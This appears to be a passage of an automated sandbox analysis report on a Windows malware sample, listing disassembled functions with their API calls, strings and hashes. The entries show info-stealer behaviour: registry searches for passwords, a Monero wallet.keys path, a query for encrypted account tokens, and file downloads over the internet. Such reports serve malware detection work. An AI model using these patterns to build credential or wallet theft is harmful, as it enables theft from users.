                                      • Part of subcall function 000D72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000D733A
                                      • Part of subcall function 000D72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000D73B1
                                      • Part of subcall function 000D72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000D740D
                                      • Part of subcall function 000D72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 000D7452
                                      • Part of subcall function 000D72D0: HeapFree.KERNEL32(00000000), ref: 000D7459
                                    • lstrcat.KERNEL32(00000000,000F17FC), ref: 000D7606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000D7648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 000D765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000D768F
                                    • lstrcat.KERNEL32(00000000,000F1804), ref: 000D76A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000D76D3
                                    • lstrcat.KERNEL32(00000000,000F1808), ref: 000D76ED
                                    • task.LIBCPMTD ref: 000D76FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: :
                                    • API String ID: 3191641157-3653984579
                                    • Opcode ID: 790f26c168defffd511cc9dc4b11457bffd804e4dfc006a33ef1da97a5dc08a1
                                    • Instruction ID: 9a7414f6a0021c2b2c111942619fcbd8bb9887b05a095d30081b5afb0d94ef20
                                    • Opcode Fuzzy Hash: 790f26c168defffd511cc9dc4b11457bffd804e4dfc006a33ef1da97a5dc08a1
                                    • Instruction Fuzzy Hash: C9315CB5901609DFCB06EBE4DC85DFE7778BB48302F148119F106A7291EA34A946CB61
                                    Function 000D72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 000D7314
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000D733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000D73B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000D740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 000D7452
                                    • HeapFree.KERNEL32(00000000), ref: 000D7459
                                    • task.LIBCPMTD ref: 000D7555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: Password
                                    • API String ID: 2808661185-3434357891
                                    • Opcode ID: 806425b36b46f00a730345a0154f175edba2684e57c8556d7d3d42bcc5843e5e
                                    • Instruction ID: 948d76fe6688189c7698989f2d1feb21c3fa60377a79274ef653679f709f7e12
                                    • Opcode Fuzzy Hash: 806425b36b46f00a730345a0154f175edba2684e57c8556d7d3d42bcc5843e5e
                                    • Instruction Fuzzy Hash: AA611FB59042589BDB25DB50DC45BD977B8BF48300F00C1EAE64D66242EB705BC9CFA1
                                    Function 000E8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00B7F268,00000000,?,000F0E2C,00000000,?,00000000), ref: 000E8130
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E8137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 000E8158
                                    • __aulldiv.LIBCMT ref: 000E8172
                                    • __aulldiv.LIBCMT ref: 000E8180
                                    • wsprintfA.USER32 ref: 000E81AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
                                    • Opcode ID: fb935023d97837c657a45a7df8aa0e4ab452778009fd05a786f202cfe672c48c
                                    • Instruction ID: f00cd0d9c10ae71a8a6e71d00064a02eb5b35e4dbe3fc167f448b71b37fe4325
                                    • Opcode Fuzzy Hash: fb935023d97837c657a45a7df8aa0e4ab452778009fd05a786f202cfe672c48c
                                    • Instruction Fuzzy Hash: 6421F9B1E44258AFDB10DFD5CC49FAEB7BCEB48B11F108619F605BB280D77859018BA5
                                    Function 000D60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4839
                                      • Part of subcall function 000D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4849
                                    • InternetOpenA.WININET(000F0DF7,00000001,00000000,00000000,00000000), ref: 000D610F
                                    • StrCmpCA.SHLWAPI(?,00B81328), ref: 000D6147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 000D618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000D61B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 000D61DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000D620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 000D6249
                                    • InternetCloseHandle.WININET(?), ref: 000D6253
                                    • InternetCloseHandle.WININET(00000000), ref: 000D6260
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: 57bab26e66969a797ab6ca10f6b3303e23d4c51a9d0abf07c26e7dc95371ddd6
                                    • Instruction ID: 72a098d35494b057e253be6cf4bfc3e8abe85c718739d2683862986c32c24810
                                    • Opcode Fuzzy Hash: 57bab26e66969a797ab6ca10f6b3303e23d4c51a9d0abf07c26e7dc95371ddd6
                                    • Instruction Fuzzy Hash: 1E5150B1A00718AFDB20DF90DC45BEE77B8EB48705F108099B605A72C1DB756A89CFA5
                                    Function 000DBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                    • lstrlen.KERNEL32(00000000), ref: 000DBC9F
                                      • Part of subcall function 000E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 000DBCCD
                                    • lstrlen.KERNEL32(00000000), ref: 000DBDA5
                                    • lstrlen.KERNEL32(00000000), ref: 000DBDB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 22defcd8c2a162fc3de233913c8e73cd51f9a03b5ec6c4f497ac45a1de1a2dbd
                                    • Instruction ID: 13ba5b184f1864ba0a3ad858a2c3f27bcf5c2c7d89b06ea20434457f6ca41b37
                                    • Opcode Fuzzy Hash: 22defcd8c2a162fc3de233913c8e73cd51f9a03b5ec6c4f497ac45a1de1a2dbd
                                    • Instruction Fuzzy Hash: 5CB15E71A102489FDB14EBA1DD96EEE7339AF19300F414129F506B6193EF347A49CBA2
                                    Function 000E6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 2321147e36b407dfa844ddeb11423d3c9dcad7c3ce238bd97d67cbf8300c5d92
                                    • Instruction ID: 18c8ae3b2ca7e3fb6b84b185366e6b157a14f7406965a51147c07522454091ac
                                    • Opcode Fuzzy Hash: 2321147e36b407dfa844ddeb11423d3c9dcad7c3ce238bd97d67cbf8300c5d92
                                    • Instruction Fuzzy Hash: 28F0E230909208EFD3429FE0E8097AC7BB8FB09713F048198F629962C0D6314B41CB92
                                    Function 000D4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000D4FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000D4FD1
                                    • InternetOpenA.WININET(000F0DDF,00000000,00000000,00000000,00000000), ref: 000D4FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 000D5011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 000D5041
                                    • InternetCloseHandle.WININET(?), ref: 000D50B9
                                    • InternetCloseHandle.WININET(?), ref: 000D50C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: caaf3341e6298b2cd749c1721a985d27c139b0e922a9b29cdd212dd2cc534d76
                                    • Instruction ID: a056aef44277661365cb5b89fc59d95e985cd8b320b0853f19e97c1b4ccb8b8c
                                    • Opcode Fuzzy Hash: caaf3341e6298b2cd749c1721a985d27c139b0e922a9b29cdd212dd2cc534d76
                                    • Instruction Fuzzy Hash: 953119B4A00218ABDB20CF54DC85BDCB7B8EB48705F1081D9FB09A7281D7706EC58FA9
                                    Function 000E83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000E8426
                                    • wsprintfA.USER32 ref: 000E8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 000E847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E8499
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,00B7EFC8,00000000,000F003F,?,00000400), ref: 000E84EC
                                    • lstrlen.KERNEL32(?), ref: 000E8501
                                    • RegQueryValueExA.ADVAPI32(00000000,00B7F040,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,000F0B34), ref: 000E8599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E8608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 290308db7c35f2600d789fef21000de99d378da8cdba8a5bdacb677fb63ff1dd
                                    • Instruction ID: ff7e14f79d32793d5504916c150847d3913c20d683220298087e73537a8d45bd
                                    • Opcode Fuzzy Hash: 290308db7c35f2600d789fef21000de99d378da8cdba8a5bdacb677fb63ff1dd
                                    • Instruction Fuzzy Hash: 702107B1A11218AFDB64DB54DC85FE9B7B8FB48701F00C199A609A6180DF716A85CFD4
                                    Function 000E7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E76A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E76AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,00B6C658,00000000,00020119,00000000), ref: 000E76DD
                                    • RegQueryValueExA.ADVAPI32(00000000,00B7F190,00000000,00000000,?,000000FF), ref: 000E76FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E7708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 355de2c8b40d8ed3ac8d89723d19db495c20c1e61cc543f1a6be2e31a96134bc
                                    • Instruction ID: d71aea9f38869c32858a9d42fdbd04af38d82da8c4d624793455761e358a1b11
                                    • Opcode Fuzzy Hash: 355de2c8b40d8ed3ac8d89723d19db495c20c1e61cc543f1a6be2e31a96134bc
                                    • Instruction Fuzzy Hash: DE014FB5A09608BFD702DBE5DC49FFDB7BCEB4C702F108454FA04A7291E6749A008B51
                                    Function 000E7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,00B6C658,00000000,00020119,000E76B9), ref: 000E775B
                                    • RegQueryValueExA.ADVAPI32(000E76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 000E777A
                                    • RegCloseKey.ADVAPI32(000E76B9), ref: 000E7784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
